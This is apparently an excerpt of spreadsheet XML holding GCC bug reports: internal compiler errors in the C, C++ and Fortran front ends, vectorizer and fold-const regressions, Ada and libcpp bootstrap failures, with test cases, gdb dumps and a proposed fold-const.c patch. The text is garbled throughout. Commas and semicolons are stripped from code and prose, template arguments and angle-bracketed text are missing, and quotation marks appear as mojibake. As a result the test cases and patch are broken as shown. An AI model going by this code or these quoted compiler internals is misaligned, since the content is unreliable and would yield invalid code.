    <t>GCC-66984</t>
  </si>
  <si>
    <t>ICE: fold_binary changes type of operand causing failure in verify_gimple_assign_binary</t>
  </si>
  <si>
    <t>This problem was previously reported in bug #46679 and bug #56363.  I'm logging it as new issue because it occurred as a recent regression in 6.0 though the changes made to 6.0 contributed only in that improved tree folding exposed this problem in our testing of UPC on the GUPC branch.  As in the two bug reports mentioned above we can't easily replicate the issue because the UPC code generator uses FLOOR_DIV_EXPR but C generally does not.
The tree verify failure occurs using -m32 (x86) because on that target the size of 'int' equals the size of 'size_t' and they have the same mode.
The test case fails as follows:
 timer_reduce.upc: In function â€˜timers_reduceâ€™:
 timer_reduce.upc:3:6: error: type mismatch in binary expression
  void timers_reduce(double *max_t int j){
       ^
 int
 sizetype
 int
 D.1986 = D.1984 /[ex] THREADS.4
 timer_reduce.upc:3:6: internal compiler error: verify_gimple failed
 0xeb38bb verify_gimple_in_seq(gimple_statement_base*)
        /eng/upc/dev/gary/gupc-merge/src/gupc/gcc/tree-cfg.c:4805
 0xbc91b6 gimplify_body(tree_node* bool)
        /eng/upc/dev/gary/gupc-merge/src/gupc/gcc/gimplify.c:9260
 0xbc960d gimplify_function_tree(tree_node*)
        /eng/upc/dev/gary/gupc-merge/src/gupc/gcc/gimplify.c:9349
 [...]
The operand type is changed here in fold-const.c:
10820         /* If arg0 is a multiple of arg1 then rewrite to the fastest div
10821            operation EXACT_DIV_EXPR.
10822
10823            Note that only CEIL_DIV_EXPR and FLOOR_DIV_EXPR are rewritten now.
10824            At one time others generated faster code it's not clear if they do
10825            after the last round to changes to the DIV code in expmed.c.  */
10826         if ((code == CEIL_DIV_EXPR || code == FLOOR_DIV_EXPR)
10827             &amp;&amp; multiple_of_p (type arg0 arg1))
10828           return fold_build2_loc (loc EXACT_DIV_EXPR type arg0 arg1)
(gdb) p code
$24 = FLOOR_DIV_EXPR
(gdb) p type
$25 = (tree) 0x7ffff188c7e0
(gdb) pt
warning: Expression is not an assignment (and might have no effect)
 &lt;integer_type 0x7ffff188c7e0 int public SI
    size  constant 32&gt;
    unit size  constant 4&gt;
    align 32 symtab 0 alias set -1 canonical type 0x7ffff188c7e0 precision 32 min  max 
    pointer_to_this &gt;
'op0' is the first operand  'arg0' is 'op0' after applying STRIP_NOPS().
(gdb) p op0
$26 = (tree) 0x7ffff19e15c0
(gdb) pt
warning: Expression is not an assignment (and might have no effect)
 &lt;nop_expr 0x7ffff19e15c0
    type &lt;integer_type 0x7ffff188c7e0 int public SI
        size 
        unit size 
        align 32 symtab 0 alias set -1 canonical type 0x7ffff188c7e0 precision 32 min  max 
        pointer_to_this &gt;
    side-effects
    arg 0 &lt;save_expr 0x7ffff19abee0
        type  unit size 
            align 32 symtab 0 alias set -1 canonical type 0x7ffff188c1f8 precision 32 min  max &gt;
        side-effects
        arg 0 
            arg 0 
                arg 0 &gt;
            arg 1 
                readonly arg 0 &gt;&gt;
        timer_reduce.upc:4:19&gt;&gt;
(gdb) p arg0
$27 = (tree) 0x7ffff19abee0
(gdb) pt
warning: Expression is not an assignment (and might have no effect)
 &lt;save_expr 0x7ffff19abee0
    type &lt;integer_type 0x7ffff188c1f8 sizetype public unsigned SI
        size 
        unit size 
        align 32 symtab 0 alias set -1 canonical type 0x7ffff188c1f8 precision 32 min  max &gt;
    side-effects
    arg 0 
        arg 0 
            arg 0 &gt;
        arg 1 
            readonly arg 0 &gt;&gt;
    timer_reduce.upc:4:19&gt;
As shown the type of arg0 is 'sizetype' and op0 is 'int'.
After this rewrite is applied: fold_build2_loc (loc EXACT_DIV_EXPR type arg0 arg1)
the 'rhs1' type will be 'sizetype' but 'lhstype' and 'rhs2_type' will be 'int'.
3930      if (!useless_type_conversion_p (lhs_type rhs1_type)
3931          || !useless_type_conversion_p (lhs_type rhs2_type))
3932        {
3933          error (type mismatch in binary expression)
3934          debug_generic_stmt (lhs_type)
3935          debug_generic_stmt (rhs1_type)
3936          debug_generic_stmt (rhs2_type)
3937          return true
3938        }
We need the type conversion encoded in op0:
(gdb) p useless_type_conversion_p(type TREE_TYPE(op0))
$28 = true
(gdb) p useless_type_conversion_p(type TREE_TYPE(arg0))
$29 = false
useless_type_conversion_p() requires that the types agree in signedness and precesion.
Perhaps this issue can be fixed by adding CEIL_DIV_EXPR and FLOOR_DIV_EXPR to the if statement at the beginning of fold_binary_loc().
Index: fold-const.c
===================================================================
--- fold-const.c        (revision 226135)
+++ fold-const.c        (working copy)
@@ -91517 +91518 @@ fold_binary_loc (location_t loc
      cases the appropriate type conversions should be put back in
      the tree that will get out of the constant folder.  */
-  if (kind == tcc_comparison || code == MIN_EXPR || code == MAX_EXPR)
+  if (kind == tcc_comparison || code == MIN_EXPR || code == MAX_EXPR
+      code == CEIL_DIV_EXPR || code == FLOOR_DIV_EXPR)
     {
       STRIP_SIGN_NOPS (arg0)
       STRIP_SIGN_NOPS (arg1)</t>
  </si>
  <si>
    <t>GCC-63563</t>
  </si>
  <si>
    <t>[4.9/5 Regression] ICE: in vectorizable_store at tree-vect-stmts.c:5106 with -mavx2</t>
  </si>
  <si>
    <t>A gentoo user emailed me the following testcase:
markus@x4 ~ % cat blub.ii
struct A
{
  unsigned long m_count
  unsigned long m_sum
  unsigned long m_min
  unsigned long m_max
  void
  m_fn1 (A *p1)
  {
    m_count = m_sum = m_min = p1-&gt;m_min
    if (__builtin_expect (m_max 0))
      m_max = p1-&gt;m_max
  }
}
struct B
{
  A m_stat[]
  void
  m_fn2 ()
  {
    A *a = 
    A b c = m_stat[0]
    for ( a &lt;  a++)
      a-&gt;m_fn1 (
  }
}
struct C
{
  B m_lock_stat
  void
  m_fn3 ()
  {
    m_lock_stat.m_fn2 ()
  }
}
struct PFS_table_share
{
  C m_table_stat
} d
void
PFS_tablesafe_aggregate_io ()
{
  d.m_table_stat.m_fn3 ()
}
markus@x4 ~ % g++ -O3 -mavx2 -c blub.ii
blub.ii: In function â€˜void PFS_tablesafe_aggregate_io()â€™:
blub.ii:41:1: internal compiler error: in vectorizable_store at tree-vect-stmts.c:5106
 PFS_tablesafe_aggregate_io ()
 ^
0xdeba83 vectorizable_store
        ../../gcc/gcc/tree-vect-stmts.c:5106
0xdf0371 vect_analyze_stmt(gimple_statement_base* bool* _slp_tree*)
        ../../gcc/gcc/tree-vect-stmts.c:7105
0xdfbc91 vect_analyze_loop_operations
        ../../gcc/gcc/tree-vect-loop.c:1505
0xdfbc91 vect_analyze_loop_2
        ../../gcc/gcc/tree-vect-loop.c:1766
0xdfbc91 vect_analyze_loop(loop*)
        ../../gcc/gcc/tree-vect-loop.c:1864
0xe113f7 vectorize_loops()
        ../../gcc/gcc/tree-vectorizer.c:432
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-8389</t>
  </si>
  <si>
    <t>[mainline regression] Access to members of base class &amp; templates</t>
  </si>
  <si>
    <t xml:space="preserve">	For the attached program g++ gives the error message:
	test.cc: In member function `Derived Derived::f() const [with T = char]':
	test.cc:30:   instantiated from here
	test.cc:6: error: `typedef int Base::Type' is protected
	test.cc:23: error: within this context
Release:
3.3 20021027 (experimental)
Environment:
System: Linux dwarf 2.4.3-XFS #7 Mon Aug 6 18:43:20 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /pdsrc/gcc/cvs/gcc/configure --program-suffix=-test --prefix=/local/gcc-test --enable-shared --enable-threads=posix --enable-version-specific-runtime-libs --enable-languages=cc++
How-To-Repeat:
	just compile attached source (g++ -c test.cc)</t>
  </si>
  <si>
    <t>dv</t>
  </si>
  <si>
    <t>GCC-38599</t>
  </si>
  <si>
    <t>There should be a Pmode == DImode version of the MIPS lwxs pattern</t>
  </si>
  <si>
    <t>mipsisa64-elf-gcc -S -O2 -msmartmips gcc.target/mips/smartmips-lwxs.c -DNOMIPS16=
does not produce an LWXS instruction.  This doesn't really matter much since SmartMIPS is only for 32-bit processors but:
  (a) it works for 64-bit ILP32 ABIs like n32 and o64.
  (b) within gcc there is an abstraction layer between Do we have SmartMIPS? and Can we use LWXS?.
So I think it's worth having a Pmode==DImode version anyway.
I'm filing this for 4.5 or later it isn't something we'd fix in 44 or
earlier.</t>
  </si>
  <si>
    <t>GCC-12064</t>
  </si>
  <si>
    <t>[3.4 regression] ICE with -O3 in expand_or_defer_fn at cp/semantics.c:2921</t>
  </si>
  <si>
    <t>The following piece of code ICEs 3.4 (20030729). This is a regression
on the 3.4 branch because 20030620 compiled the code just fine.
Compile with -O3.
----------------------- cut ---------------------------
template  struct ConstVector
{
	virtual ~ ConstVector () 
} 
template  struct Vector : virtual ConstVector 
{
} 
template  struct X 
Vector  &gt; DoubleVector 
----------------------- cut ---------------------------
I'll no retest with a more recent version of 3.4.
   regards  Christian</t>
  </si>
  <si>
    <t>GCC-84109</t>
  </si>
  <si>
    <t>ICE in adjustl on allocatable array of strings</t>
  </si>
  <si>
    <t>Created attachment 43273
Output on stderr when issuing the command: gfortran a.f90
This program (a.f90):
program prog
   implicit none
   character(len=:) allocatable:: c(:)
   allocate(character(len=20) :: c(10))
   c =   ab  
   c = adjustl(c)       ! ICE
   print *'c(1)'
end program
generates an ICE see attachment for output.
gfortran -v:
/sara/sw/gcc-7.3.0/bin/gfortran -I/sara/sw/gcc-7.3.0/include -v -L/sara/sw/gcc-7.3.0/lib64 -L/sara/sw/gcc-7.3.0/lib
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/homes/sara/sw/gcc-7.3.0/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.3.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-7.3.0/configure --prefix=/sara/sw/gcc-7.3.0 --enable-languages=cc++fortran
Thread model: posix
gcc version 7.3.0 (GCC) 
COMPILER_PATH=/homes/sara/sw/gcc-7.3.0/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.3.0/:/homes/sara/sw/gcc-7.3.0/bin/../libexec/gcc/
LIBRARY_PATH=/homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/x86_64-pc-linux-gnu/7.3.0/:/homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/:/homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/x86_64-pc-linux-gnu/7.3.0/../../../../lib64/:/lib/x86_64-linux-gnu/:/lib/../lib64/:/usr/lib/x86_64-linux-gnu/:/homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/x86_64-pc-linux-gnu/7.3.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-I' '/sara/sw/gcc-7.3.0/include' '-v' '-L/sara/sw/gcc-7.3.0/lib64' '-L/sara/sw/gcc-7.3.0/lib' '-mtune=generic' '-march=x86-64'
 /homes/sara/sw/gcc-7.3.0/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.3.0/collect2 -plugin /homes/sara/sw/gcc-7.3.0/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.3.0/liblto_plugin.so -plugin-opt=/homes/sara/sw/gcc-7.3.0/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.3.0/lto-wrapper -plugin-opt=-fresolution=/tmp/ccK5tPU4.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_s -plugin-opt=-pass-through=-lc -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_s --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 /usr/lib/x86_64-linux-gnu/crt1.o /usr/lib/x86_64-linux-gnu/crti.o /homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/x86_64-pc-linux-gnu/7.3.0/crtbegin.o -L/sara/sw/gcc-7.3.0/lib64 -L/sara/sw/gcc-7.3.0/lib -L/homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/x86_64-pc-linux-gnu/7.3.0 -L/homes/sara/sw/gcc-7.3.0/bin/../lib/gcc -L/homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/x86_64-pc-linux-gnu/7.3.0/../../../../lib64 -L/lib/x86_64-linux-gnu -L/lib/../lib64 -L/usr/lib/x86_64-linux-gnu -L/homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/x86_64-pc-linux-gnu/7.3.0/../../.. -rpath=/sara/sw/gcc-7.3.0/lib64 -rpath=/sara/sw/gcc-7.3.0/lib -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /homes/sara/sw/gcc-7.3.0/bin/../lib/gcc/x86_64-pc-linux-gnu/7.3.0/crtend.o /usr/lib/x86_64-linux-gnu/crtn.o
/usr/lib/x86_64-linux-gnu/crt1.o: In function `_start':
(.text+0x20): undefined reference to `main'
collect2: error: ld returned 1 exit status</t>
  </si>
  <si>
    <t>wvermin</t>
  </si>
  <si>
    <t>GCC-15314</t>
  </si>
  <si>
    <t>ICE caused by array initializer in derived type definition</t>
  </si>
  <si>
    <t>% ~/tree-ssa-20040430/bin/gfortran defect_derived_init.f90
defect_derived_init.f90: In function `MAIN__':
defect_derived_init.f90:0: internal compiler error: in simplify_subreg at
simplify-rtx.c:3439
% cat defect_derived_init.f90
program main
  type foo
     integer :: a(10) = 1
     integer :: b = 1
  end type foo
  type(foo) :: x
  print* x%b
end program main</t>
  </si>
  <si>
    <t>GCC-17527</t>
  </si>
  <si>
    <t>Ada Bootstrap problem because of -Werror</t>
  </si>
  <si>
    <t>Hi I am reporting yet another bootstrap problem. This time on FreeBSD.
Preprocessed source attaced.
make[1]: Entering directory `/home/4/wilx/tmp/gcc-head/objdir/gcc'
make CC= stage1/xgcc -Bstage1/ -B/home/4/wilx/i386-unknown-freebsd4.10/bin/
CC_FOR_BUILD= stage1/xgcc -Bstage1/ -B/home/4/wilx/i386-unknown-freebsd4.10/bin/ \
         STAGE_PREFIX=stage1/ \
         ADAFLAGS=-gnatpg -gnata CFLAGS=-g -O2 LDFLAGS=
WARN_CFLAGS=\$(GCC_WARN_CFLAGS) STRICT_WARN=-pedantic -Wno-long-long
-Wno-variadic-macros -Wold-style-definition -Werror libdir=/home/4/wilx/lib
LANGUAGES=c gcov gcov-dump ada c++ objc MAKEINFO=makeinfo
--split-size=5000000 MAKEINFOFLAGS=--no-split MAKEOVERRIDES=
OUTPUT_OPTION=-o \$@ \
         CFLAGS=-g -O2 WERROR=-Werror
make[2]: Entering directory `/home/4/wilx/tmp/gcc-head/objdir/gcc'
stage1/xgcc -Bstage1/ -B/home/4/wilx/i386-unknown-freebsd4.10/bin/ -c   -g -O2
-DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes   
-Werror -fno-common   -DHAVE_CONFIG_H     \
            -I. -Iada -I../../srcdir/gcc -I../../srcdir/gcc/ada
-I../../srcdir/gcc/../include -I../../srcdir/gcc/../libcpp/include 
../../srcdir/gcc/ada/init.c -o ada/init.o
cc1: warnings being treated as errors
../../srcdir/gcc/ada/init.c:1586: warning: function declaration isn't a prototype
../../srcdir/gcc/ada/init.c: In function '__gnat_error_handler':
../../srcdir/gcc/ada/init.c:1597: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1602: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1607: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1612: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1617: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1587: warning: unused parameter 'code'
../../srcdir/gcc/ada/init.c:1588: warning: unused parameter 'sc'
../../srcdir/gcc/ada/init.c: At top level:
../../srcdir/gcc/ada/init.c:1642: warning: function declaration isn't a prototype
make[2]: *** [ada/init.o] Error 1
make[2]: Leaving directory `/home/4/wilx/tmp/gcc-head/objdir/gcc'
make[1]: *** [stage2_build] Error 2
make[1]: Leaving directory `/home/4/wilx/tmp/gcc-head/objdir/gcc'
make: *** [bootstrap] Error 2
wilx@logout:::~/tmp/gcc-head/objdir/gcc&gt; stage1/xgcc -Bstage1/
-B/home/4/wilx/i386-unknown-freebsd4.10/bin/ -c   -g -O2 -DIN_GCC   -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes    -Werror -fno-common
  -DHAVE_CONFIG_H     \
            -I. -Iada -I../../srcdir/gcc -I../../srcdir/gcc/ada
-I../../srcdir/gcc/../include -I../../srcdir/gcc/../libcpp/include 
../../srcdir/gcc/ada/init.c -v -save-temps -o ada/init.o
Reading specs from stage1/specs
Configured with: ../srcdir/configure --disable-nls
--enable-version-specific-runtime-libs --enable-dwarf2 --with-cpu=pentium3
--with-arch=pentium3 --with-system-zlib --disable-shared --prefix=/home/4/wilx
--enable-languages=cc++objcada --disable-sjlj-exceptions
--enable-shared=libstdc++ --enable-shared=libobjc --with-gc=zone
--enable-libmudflap --enable-libada
Thread model: posix
gcc version 4.0.0 20040916 (experimental)
 stage1/cc1 -E -quiet -v -I. -Iada -I../../srcdir/gcc -I../../srcdir/gcc/ada
-I../../srcdir/gcc/../include -I../../srcdir/gcc/../libcpp/include -iprefix
/home/4/wilx/tmp/gcc-head/objdir/gcc/stage1/../lib/gcc/i386-unknown-freebsd4.10/4.0.0/
-isystem ./include -DIN_GCC -DHAVE_CONFIG_H ../../srcdir/gcc/ada/init.c
-march=pentium3 -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -Werror -fno-common -fworking-directory -O2
-fpch-preprocess -o init.i
ignoring nonexistent directory
/home/4/wilx/tmp/gcc-head/objdir/gcc/stage1/../lib/gcc/i386-unknown-freebsd4.10/4.0.0/include
ignoring nonexistent directory
/home/4/wilx/tmp/gcc-head/objdir/gcc/stage1/../lib/gcc/i386-unknown-freebsd4.10/4.0.0/../../../../i386-unknown-freebsd4.10/include
ignoring nonexistent directory
/home/4/wilx/lib/gcc/i386-unknown-freebsd4.10/4.0.0/include
ignoring nonexistent directory
/home/4/wilx/lib/gcc/i386-unknown-freebsd4.10/../../../i386-unknown-freebsd4.10/include
#include ... search starts here:
#include  search starts here:
 .
 ada
 ../../srcdir/gcc
 ../../srcdir/gcc/ada
 ../../srcdir/gcc/../include
 ../../srcdir/gcc/../libcpp/include
 ./include
 /usr/local/include
 /home/4/wilx/include
 /usr/include
End of search list.
 stage1/cc1 -fpreprocessed init.i -quiet -dumpbase init.c -march=pentium3
-auxbase-strip ada/init.o -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -Werror -version -fno-common -o init.s
GNU C version 4.0.0 20040916 (experimental) (i386-unknown-freebsd4.10)
        compiled by GNU C version 2.8.1.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
cc1: warnings being treated as errors
../../srcdir/gcc/ada/init.c:1586: warning: function declaration isn't a prototype
../../srcdir/gcc/ada/init.c: In function '__gnat_error_handler':
../../srcdir/gcc/ada/init.c:1597: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1602: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1607: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1612: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1617: warning: assignment discards qualifiers from
pointer target type
../../srcdir/gcc/ada/init.c:1587: warning: unused parameter 'code'
../../srcdir/gcc/ada/init.c:1588: warning: unused parameter 'sc'
../../srcdir/gcc/ada/init.c: At top level:
../../srcdir/gcc/ada/init.c:1642: warning: function declaration isn't a prototype</t>
  </si>
  <si>
    <t>GCC-65658</t>
  </si>
  <si>
    <t>Jump threading too pessimistic when optimizing for size</t>
  </si>
  <si>
    <t>Created attachment 35209
testcase compile with -O2 -Wall note uninitialized warnings for SRA's variables and trivially threadable block in setup()
The jump threader will cancel jump threads when optimizing for size and the block will need to be duplicated.  But that heuristic fails for something a block like this:
  # _36 = PHI 
  # problem$l3_101 = PHI 
  # problem$l4_100 = PHI 
  amt ={v} {CLOBBER}
  if (_36 != 0)
    goto 
  else
    goto 
All incoming edges are threadable and the block produces no code.  It's really just a redirection block that's not recognized as such -- probably due to the clobber statement.  
The net result is we cancel the jump thread get worse code and issue false positive warnings for uninitialized variables.  All around a lose.</t>
  </si>
  <si>
    <t>GCC-10385</t>
  </si>
  <si>
    <t>Internal compiler error in build_up_reference at cp/cvt.c:353 on invalid dynamic_cast</t>
  </si>
  <si>
    <t>Internal compiler error in build_up_reference at cp/cvt.c:353
Please submit a full bug report
-------
Command line:
#gcc -v -save-temps  -I.  -Igalib util -O0 -c regras.cc
Reading specs from /usr/lib/gcc-lib/i386-linux/3.2.3/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77protopascalobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.2.3 20030407 (Debian prerelease)
 /usr/lib/gcc-lib/i386-linux/3.2.3/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -I. -I. -Igalib -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ regras.cc regras.ii
GNU CPP version 3.2.3 20030407 (Debian prerelease) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-linux/include
ignoring duplicate directory .
#include ... search starts here:
#include  search starts here:
 .
 galib
 /usr/include/c++/3.2
 /usr/include/c++/3.2/i386-linux
 /usr/include/c++/3.2/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/3.2.3/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-linux/3.2.3/cc1plus -fpreprocessed regras.ii -quiet -dumpbase regras.cc -O0 -version -o regras.s
GNU CPP version 3.2.3 20030407 (Debian prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2.3 20030407 (Debian prerelease) (i386-linux)
        compiled by GNU C version 3.2.3 20030407 (Debian prerelease).
regras.cc: In function `int main()':
regras.cc:99: Internal compiler error in build_up_reference at cp/cvt.c:353
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
unknown
Environment:
gcc version 3.2.3 20030407 (Debian prerelease)
Linux athlon 2.4.20-k7 #1 Tue Jan 14 00:29:06 EST 2003 i686 unknown unknown GNU/Linux
How-To-Repeat:
type:
# gcc -I. -Igalib util -O0 -c regras.cc</t>
  </si>
  <si>
    <t>douglas</t>
  </si>
  <si>
    <t>GCC-3058</t>
  </si>
  <si>
    <t>Compilation Error - Requested Reporting</t>
  </si>
  <si>
    <t>Compiler gave me the following message:
 Internal compiler error 980711
Release:
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
Environment:
Linux
How-To-Repeat:
???</t>
  </si>
  <si>
    <t>dasnyder</t>
  </si>
  <si>
    <t>GCC-16258</t>
  </si>
  <si>
    <t>ICE when using invalid typedef's</t>
  </si>
  <si>
    <t>Preprocessed source: 
# 1 source.c 
typedef double tablica[N] 
typedef struct { 
        tablica dane 
} rekord 
causes ICE with signal 11. 
Output of gcc -v: 
Reading specs from /usr/lib/gcc-lib/i586-pld-linux/2.95.4/specs 
gcc version 2.95.4 20010319 (prerelease) 
 /usr/lib/gcc-lib/i586-pld-linux/2.95.4/cpp0 -lang-c -v -D__GNUC__=2 
-D__GNUC_MINOR__=95 -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ 
-D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) 
-Amachine(i386) -Di386 -D__i386 -D__i386__ -Di586 -Dpentium -D__i586 -D__i586__ 
-D__pentium -D__pentium__ source.c /home/users/roman/tmp/cc22CXce.i 
GNU CPP version 2.95.4 20010319 (prerelease) (i386 Linux/ELF) 
#include ... search starts here: 
#include  search starts here: 
 /usr/local/include 
 /usr/lib/gcc-lib/i586-pld-linux/2.95.4/include 
 /usr/include 
End of search list. 
The following default directories have been omitted from the search path: 
 /usr/include/g++ 
 /usr/lib/gcc-lib/i586-pld-linux/2.95.4/../../../../i586-pld-linux/include 
End of omitted list. 
 /usr/lib/gcc-lib/i586-pld-linux/2.95.4/cc1 /home/users/roman/tmp/cc22CXce.i 
-quiet -dumpbase source.c -version -o /home/users/roman/tmp/ccgltxUm.s 
GNU C version 2.95.4 20010319 (prerelease) (i586-pld-linux) compiled by GNU C 
version 2.95.4 20010319 (prerelease).</t>
  </si>
  <si>
    <t>GCC-11015</t>
  </si>
  <si>
    <t>[3.4 only] -finstrument-functions and dynamic stack allocation</t>
  </si>
  <si>
    <t>Bad code is emitted for automatic arrays of variable size with sizes N*16+1.
The compiler generates reserves to less space on the stack for the automatic
array when the initial size is N*16+1. The reserved size on the stack is one
byte to short. Writing to the last index in the array will overwrite parts of
the stack frame. 
--------------------------------------------------------------------------------
Steps to reproduce the problem:
Prerequisites:
Compiler used:
Reading specs from /usr/local/ppc/usr/lib/gcc-lib/powerpc-ses-linux/3.3/specs
Configured with: ../../gcc-3.3/configure --target=powerpc-ses-linux
--prefix=/usr/local/ppc/usr --enable-languages=cc++
--with-sysroot=/usr/local/ppc/usr/powerpc-ses-linux --enable-shared --enable-threads
Thread model: posix
gcc version 3.3
The problem also exists in the gcc 3.2.3 release !!!
--------------------------------------------------------------------------------
Commandline which triggers the bug:
/usr/local/ppc/usr/powerpc-ses-linux/bin/gcc -fPIC -finstrument-functions
/prog/test/source/gcc_test.cpp -o test
-------------------------------------------------------------------------------
Code to reproduce the problem. When run the program will SEGFAULT when reaching
the index 17.
void badFunc(int size)
    { 
    char temp[size]
    temp[size-1] = '\0'
    }
int main(int argc char* argv[] )
    {
    for (int i=2 i &lt; 258 ++i)
        {
        badFunc(i)
        }
    }
--------------------------------------------------------------------------------
The compiler options -fPIC -finstrument-functions are only necessary to actually
poduce a SEGFAULT. The bad stack alloaction is independent of these options.</t>
  </si>
  <si>
    <t>martin.lubich</t>
  </si>
  <si>
    <t>GCC-37923</t>
  </si>
  <si>
    <t>[4.4 Regression] CPPFLAGS now unset for stage 1 build of libcpp files.</t>
  </si>
  <si>
    <t>Building gcc trunk with...
../gcc-4.4-20081026/configure --prefix=/sw --prefix=/sw/lib/gcc4.4 --mandir=/sw/share/man --infodir=/sw/share/info --enable-languages=cc++fortranobjcjava --with-
arch=nocona --with-tune=generic --build=i686-apple-darwin9 --with-gmp=/sw --with-libiconv-prefix=/sw --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/us
r/X11R6/lib --with-cloog=/sw --with-ppl=/sw --disable-libjava-multilib
has always worked on i686-apple-darwin9 until recently. Now the CPPFLAGS setting of -I/sw/include is being unset at the toplevel Makefile (even though it is set in the Makefile in the libcpp subdirectory). This causes the bootstrap to fail as...
gcc  -I../../gcc-4.4-20081026/libcpp -I. -I../../gcc-4.4-20081026/libcpp/../include -I../../gcc-4.4-20081026/libcpp/include  -g -fkeep-inline-functions -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -pedantic -Wno-long-long  -I../../gcc-4.4-20081026/libcpp -I. -I../../gcc-4.4-20081026/libcpp/../include -I../../gcc-4.4-20081026/libcpp/include  -c -o charset.o -MT charset.o -MMD -MP -MF .deps/charset.Tpo ../../gcc-4.4-20081026/libcpp/charset.c
In file included from ../../gcc-4.4-20081026/libcpp/charset.c:22:
../../gcc-4.4-20081026/libcpp/system.h:255:21: error: libintl.h: No such file or directory
make[3]: *** [charset.o] Error 1
make[2]: *** [all-stage1-libcpp] Error 2
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2
If one goes into /sw/src/fink.build/gcc44-4.3.999-20081026/darwin_objdir/libcpp and executes make the compile completes as...
gcc  -I../../gcc-4.4-20081026/libcpp -I. -I../../gcc-4.4-20081026/libcpp/../include -I../../gcc-4.4-20081026/libcpp/include -I/sw/include -g -fkeep-inline-functions -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -pedantic -Wno-long-long  -I../../gcc-4.4-20081026/libcpp -I. -I../../gcc-4.4-20081026/libcpp/../include -I../../gcc-4.4-20081026/libcpp/include -I/sw/include -c -o charset.o -MT charset.o -MMD -MP -MF .deps/charset.Tpo ../../gcc-4.4-20081026/libcpp/charset.c
The missing -I/sw/include set in the line...
CPPFLAGS = -I/sw/include
...in the Makefile in /sw/src/fink.build/gcc44-4.3.999-20081026/darwin_objdir/libcpp. However at the toplevel /sw/src/fink.build/gcc44-4.3.999-20081026/darwin_objdir
has...
CPPFLAGS_FOR_BUILD = 
...
CPPFLAGS = 
...
CPPFLAGS_FOR_TARGET = 
I believe this was caused by...
-----------------------------------------------------------------------
r141292 | drow | 2008-10-22 09:30:19 -0400 (Wed 22 Oct 2008) | 21 lines
        ./
        PR gdb/921
        PR gdb/1646
        PR gdb/2175
        PR gdb/2176
        * Makefile.def (flags_to_pass): Add CPPFLAGS_FOR_BUILD and CPPFLAGS.
        * Makefile.tpl (BUILD_EXPORTS): Set CPPFLAGS.
